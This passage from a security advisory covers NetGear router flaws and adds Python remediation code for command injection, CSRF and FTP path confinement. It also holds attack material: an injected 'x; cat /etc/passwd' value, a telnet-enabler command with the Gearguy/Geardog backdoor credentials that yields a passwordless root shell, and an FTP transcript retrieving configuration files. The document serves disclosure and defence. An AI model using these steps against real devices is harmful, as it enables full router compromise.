Solution
--------
Validate untrusted user input using a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops ('.') and hyphens ('-').
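The following is an added illustration of that solution, written for this page rather than taken from BAE Systems or NetGear. It contrasts the string-splicing pattern behind the command-execution findings with a whitelist check followed by a no-shell invocation. The 253-character cap and the rejection of a leading hyphen are assumptions added here (the advisory only lists the permitted characters); the device firmware is C, but the logic is the same.

```python
import re
import subprocess

# Allowlist exactly as the advisory's solution states: ASCII letters, digits, '.', '-'.
# The length cap of 253 is an added assumption (the DNS maximum), not from the advisory.
_HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def is_valid_hostname(value):
    """True only if every character is allowlisted and the value cannot be mistaken
    for a command-line option: a leading '-' passes the character check but would be
    parsed as a flag by ping/nslookup, so it is rejected as well (added rule)."""
    if not isinstance(value, str) or _HOSTNAME_RE.fullmatch(value) is None:
        return False
    return not value.startswith("-")


def ping_command_vulnerable(host):
    """The pattern behind the advisory's command-execution findings: the untrusted
    value is spliced into a string that a shell will parse. Shown for contrast only."""
    return "ping -c 1 " + host          # 'x; cat /etc/passwd' becomes two commands


def ping_command_safe(host):
    """Validate first, then build an argv list so no shell ever parses the value."""
    if not is_valid_hostname(host):
        raise ValueError("rejected hostname %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(host, timeout=5):
    """Run the validated command without a shell; returns (exit code, stdout)."""
    proc = subprocess.run(ping_command_safe(host), capture_output=True,
                          text=True, timeout=timeout, shell=False)
    return proc.returncode, proc.stdout
```

Whitelisting the characters is what closes the injection; passing the value as its own argv element (shell=False) is the second line of defence, so that even a future relaxation of the whitelist cannot reintroduce shell metacharacter parsing.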
4. No Cross-Site Request Forgery (CSRF) Protection
===================================================
Requires
--------
Luring a logged-in admin user into following a malicious link
Description
-----------
An attacker can lure a user into following an untrusted link to a malicious webpage that exploits the lack of CSRF protection by forcing the user's web browser to perform unwanted actions, such as altering firewall rules. This attack returns no information to the attacker, so it is effectively 'blind'; this does not, however, reduce the threat.
The command execution vulnerabilities described above can be performed through CSRF.
Impact
------
Using this vulnerability, BAE Systems was able to update the device's configuration, including changing WPA keys, alter firewall rules, and execute commands by exploiting the ping and DNS features.
Solution
--------
Include an anti-CSRF token in all web forms and ensure that the token is present and correct when HTTP requests for actions are received.
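An added example of that solution, not code from BAE Systems or from the NetGear firmware: a per-session random token is embedded in a hidden form field and every state-changing handler refuses requests that do not carry it. The session store, form markup and handler names are hypothetical; the point is that the browser attaches the login cookie to a forged cross-site POST just as it does to a genuine one, so only the token, which a third-party page cannot read, distinguishes them.

```python
import hmac
import secrets

# Constructed in-memory store of per-session anti-CSRF tokens; a device would keep this
# alongside the login session. Assumption: session_id is the value of the login cookie.
_CSRF_TOKENS = {}


def issue_csrf_token(session_id):
    """Return the session's token, minting an unguessable one on first use.
    This value goes into a hidden field of every state-changing form."""
    if session_id not in _CSRF_TOKENS:
        _CSRF_TOKENS[session_id] = secrets.token_urlsafe(32)
    return _CSRF_TOKENS[session_id]


def render_firewall_form(session_id):
    """Hidden-field carrier for the token (hypothetical markup, not the device's own)."""
    return (
        '<form method="POST" action="/firewall">\n'
        '  <input type="hidden" name="csrf_token" value="%s">\n'
        '  <input type="text" name="rule">\n'
        '  <input type="submit" value="Apply">\n'
        '</form>' % issue_csrf_token(session_id)
    )


def csrf_token_is_valid(session_id, submitted):
    """Constant-time comparison against the stored token; absent or unknown never passes."""
    expected = _CSRF_TOKENS.get(session_id)
    if expected is None or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected, submitted)


def handle_firewall_post(session_id, form):
    """Server side of a state-changing action. Authentication (the cookie) is present on
    the forged request too, so the handler checks the token before doing anything."""
    if not csrf_token_is_valid(session_id, form.get("csrf_token")):
        return (403, "Forbidden: missing or invalid anti-CSRF token")
    rule = form.get("rule", "")
    # ... apply `rule` to the firewall here ...
    return (200, "firewall rule applied: %s" % rule)


def demo():
    """Legitimate submission vs. the requests a malicious page could make.
    Returns the three HTTP status codes."""
    session = "admin-session-cookie"                     # constructed session id
    render_firewall_form(session)                         # token minted and embedded
    rule = "allow tcp/22 from any"
    legit = {"csrf_token": _CSRF_TOKENS[session], "rule": rule}
    forged = {"rule": rule}                               # attacker cannot read the token
    guessed = {"csrf_token": secrets.token_urlsafe(32), "rule": rule}
    return (handle_firewall_post(session, legit)[0],
            handle_firewall_post(session, forged)[0],
            handle_firewall_post(session, guessed)[0])
```

The check must cover every action that changes state, including those reachable by GET and the ping and DNS endpoints that also carry the command-execution issues; a token that is validated on only some forms leaves the others exposed.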
5. Gearguy/Geardog Telnet Backdoor
===================================
Requires
--------
Ability to telnet to port 23 (only on LAN side by default)
Description
-----------
There is a backdoor (feature) built into many NetGear devices, where a user can gain operating system command access without requiring a password. This issue has been previously reported in other NetGear devices.
NetGear provides a Windows executable to do this. A Linux client is available from
Send a Blowfish-encrypted message to port 23 from the LAN. On reconnecting to port 23, the device provides a shell without requiring a password.
Impact
------
Using this vulnerability, BAE Systems was able to gain a root shell on the underlying Linux operating system without supplying any authentication credentials. This would allow complete device compromise, which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
Proof of concept
----------------
python telnet-enabler.py 192.168.0.1 "204E7F2172C8" Gearguy Geardog
Sent telnet enable payload to '192.168.0.1:23'
Solution
--------
Remove the backdoor feature from the device. If a 'last resort' admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function.
6. FTP Insecure Root Directory
===============================
Requires
--------
FTP to be enabled (not enabled by default)
Description
-----------
The FTP server allows a user to access configuration files and to traverse outside the folder that contains the files intended to be shared by FTP.
It is possible to list and retrieve files in the / folder; however, the user is prevented from using the cd or CWD command to change the current directory to '/'. The restriction is applied only to CWD, not to the listing and retrieval commands.
Impact
------
Using this vulnerability, BAE Systems was able to gain access to sensitive configuration files.
Proof of concept
----------------
root@bt# ftp 192.168.0.1
Connected to 192.168.0.1.
230 User logged in.
Name (192.168.0.1:root): ftp
230 User logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT 192.168.0.6:49211 OK
150 BINARY data connection established.
lrwxrwxrwx 1 nobody root 18 Jan 01 2003 USB_Storage
226 Directory list has been submitted.
ftp> cd /
550 Error: Access Denied.
ftp> ls /
200 PORT 192.168.0.6:55927 OK
150 BINARY data connection established.
-rw-r--r-- 1 nobody root 2 Jan 01 2003 all_no_password
-rw-r--r-- 1 nobody root 1700 Jan 01 2003 bftpd.conf
drwxr-xr-x 3 nobody root 0 Jan 01 2003 conf
-rw-r--r-- 1 nobody root 2 Jan 01 2003 lan3_time
-r--r--r-- 1 nobody root 1430 Jan 01 2003 lan_dev
-rw-r--r-- 1 nobody root 2 Jan 01 2003 lan_time
drwxr-xr-x 48 nobody root 0 Jan 01 2003 mnt
-rw-r--r-- 1 nobody root 1 Jan 01 2003 opendns.flag
-rw-r--r-- 1 nobody root 0 Jan 01 2003 opendns.tbl
-rw-r--r-- 1 nobody root 0 Jan 01 2003 opendns_auth.tbl
drwxr-xr-x 2 nobody root 0 Jan 01 2003 ppp
-rw-r--r-- 1 nobody root 38 Jan 01 2003 resolv.conf
-rw-r--r-- 1 nobody root 208 Jan 01 2003 ripd.conf
drwxr-xr-x 4 nobody root 0 Jan 01 2003 samba
drwxr-xr-x 2 nobody root 0 Jan 01 2003 shares
-rw-r--r-- 1 nobody root 262 Jan 01 2003 space_info
-rw------- 1 nobody root 2 Oct 14 14:15 timesync
-rw-r--r-- 1 nobody root 242 Jan 01 2003 udhcpd.conf
-rw-r--r-- 1 nobody root 0 Jan 01 2003 udhcpd.leases
-rw-r--r-- 1 nobody root 4 Jan 01 2003 udhcpd.pid
-rw-r--r-- 1 nobody root 2 Jan 01 2003 udhcpd_resrv.conf
-rw-r--r-- 1 nobody root 3562 Jan 01 2003 upnp_xml
drwxr-xr-x 2 nobody root 0 Jan 01 2003 usb_vol_name
drwxr-xr-x 11 nobody root 0 Jan 01 2003 var
-r--r--r-- 1 nobody root 1922 Jan 01 2003 wan_dev
-rw-r--r-- 1 nobody root 3 Jan 01 2003 wan_time
drwxr-xr-x 2 nobody root 0 Jan 01 1999 wlan
-rw-r--r-- 1 nobody root 2 Jan 01 2003 wlan_time
-rw-r--r-- 1 nobody root 0 Jan 01 2003 zebra.conf
226 Directory list has been submitted.
ftp>
ftp> get /bftpd.conf
local: ./bftpd.conf remote: /bftpd.conf
200 PORT 192.168.0.5:53750 OK
150 BINARY data connection established.
226 File transmission successful.
1454 bytes received in 0.00 secs (3256.7 kB/s)
Solution
--------
Enforce the restriction to the /shares folder for all FTP commands (LIST, NLST, RETR and so on), not only CWD.
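An added example of that solution, written for this page and not taken from bftpd or the NetGear firmware: every client-supplied path, whatever verb carries it, is normalised and then mapped beneath the share root, so "/" means /shares and ".." can never climb above it. The FtpSession class and its reply strings are hypothetical; the path logic is pure posixpath string handling so it runs without a filesystem, and a real server would additionally resolve symlinks with os.path.realpath and re-check the prefix.

```python
import posixpath

FTP_ROOT = "/shares"   # every client-visible path is mapped beneath this directory


def map_to_root(root, cwd, requested):
    """Map a client path (absolute, or relative to the client's virtual cwd) onto the
    real filesystem beneath `root`. Returns (virtual_path, real_path).

    The client never names anything above root: '/' means root, and '..' components
    are collapsed by normpath before the join, so '/../../etc' still lands in root.
    """
    if "\x00" in requested:                       # NUL would truncate a C path
        raise PermissionError("550 Error: Access Denied.")
    root = posixpath.normpath(root)
    virtual = requested if requested.startswith("/") else posixpath.join(cwd, requested)
    virtual = "/" + posixpath.normpath(virtual).lstrip("/")   # absolute, no '..', no '//'
    real = posixpath.normpath(posixpath.join(root, virtual.lstrip("/")))
    # Belt and braces: refuse anything that somehow resolved outside root.
    if real != root and not real.startswith(root.rstrip("/") + "/"):
        raise PermissionError("550 Error: Access Denied.")
    return virtual, real


class FtpSession:
    """Minimal dispatcher showing one confinement check applied to every verb."""

    def __init__(self, root=FTP_ROOT):
        self.root = root
        self.cwd = "/"          # virtual cwd as the client sees it

    def handle(self, verb, arg="."):
        """CWD, LIST, NLST and RETR all go through map_to_root. The advisory's finding
        was that only CWD was restricted; here a path-taking verb cannot bypass it."""
        verb = verb.upper()
        try:
            virtual, real = map_to_root(self.root, self.cwd, arg)
        except PermissionError as e:
            return str(e)
        if verb == "CWD":
            self.cwd = virtual
            return "250 Directory changed to %s" % virtual
        if verb in ("LIST", "NLST"):
            return "150 listing %s" % real      # a server would read real here
        if verb == "RETR":
            return "150 sending %s" % real      # a server would open real here
        return "502 Command not implemented."
```

With this mapping the 'ls /' and 'get /bftpd.conf' from the proof of concept resolve to /shares and /shares/bftpd.conf respectively, so the configuration files at the real root are simply not addressable.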
7. Cannot Disable WPS
======================
Requires
--------
Local proximity and WiFi enabled